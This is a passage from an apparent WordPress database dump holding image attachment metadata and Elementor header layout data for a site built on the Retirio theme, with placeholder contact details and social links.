";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-08-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5173;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2032;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-08-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9452;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-08-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12679;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-08-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13040;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-08-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5394;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-08-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1275;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(361,4073,'_wp_attached_file','2022/06/product-09.jpg'),(362,4073,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-09.jpg\";s:8:\"filesize\";i:110033;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-09-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7985;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3350;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-09-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14290;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-09-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19318;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-09-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19513;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-09-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8488;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-09-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1991;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(363,4387,'_wp_attached_file','2022/06/decor-home-1-about-interior.jpg'),(364,4387,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:470;s:6:\"height\";i:520;s:4:\"file\";s:39:\"2022/06/decor-home-1-about-interior.jpg\";s:8:\"filesize\";i:121025;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15965;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5471;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31385;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-378x520.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:520;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34466;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-470x473.jpg\";s:5:\"width\";i:470;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43333;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:39:\"decor-home-1-about-interior-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17841;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:39:\"decor-home-1-about-interior-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2954;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(658,4492,'_wp_page_template','default'),(659,4492,'hf_options','header'),(660,4492,'_elementor_edit_mode','builder'),(661,4492,'_elementor_template_type','wp-post'),(662,4492,'_elementor_version','3.8.1'),(663,4492,'_elementor_data','[{\"id\":\"dc1de50\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"15\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"0183fbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"452409e\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"bc4c9cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"406f25a\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f7278e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"5a9b913\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"b8901ed\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(664,4492,'_elementor_page_assets','a:0:{}'),(666,51,'_wp_page_template','default'),(667,51,'hf_options','header'),(668,51,'_elementor_edit_mode','builder'),(669,51,'_elementor_template_type','wp-post'),(670,51,'_elementor_version','3.6.6'),(671,51,'_elementor_data','[{\"id\":\"7a4dbe5\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"40\",\"bottom\":\"4\",\"left\":\"40\",\"isLinked\":false},\"hide_mobile\":\"hidden-mobile\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"c7453ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-start\"},\"elements\":[{\"id\":\"f6049c6\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"c62eee8\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\",\"icons_display\":\"flex\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"19f1469\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\"},\"elements\":[{\"id\":\"741870a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"text\",\"email_label\":\"needhel@company.com\",\"email_address\":\"needhel@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"},\"text\":\"Mon - Sat: 8.00 am - 7.00 pm\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"ac74640\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9050f\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"70\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"background_background\":\"classic\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"d0c5e47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"3d4c05c\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"6eaf1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"4c538c3\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f4f1d3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"e0ad28b\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"0b0c6e3\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(672,51,'_elementor_page_assets','a:0:{}'),(674,78,'_wp_page_template','default'),(675,78,'hf_options','header'),(676,78,'_elementor_edit_mode','builder'),(677,78,'_elementor_template_type','wp-post'),(678,78,'_elementor_version','3.6.6'),(679,78,'_elementor_data','[{\"id\":\"0c5f0dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"8\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"f93bc8a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"763f753\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Call anytime\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"bf1b6c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"f00805a\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"beab91f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"b558664\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Send email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f47693c\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[{\"id\":\"a76c6cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":30},\"elements\":[{\"id\":\"5fbe4bf\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab 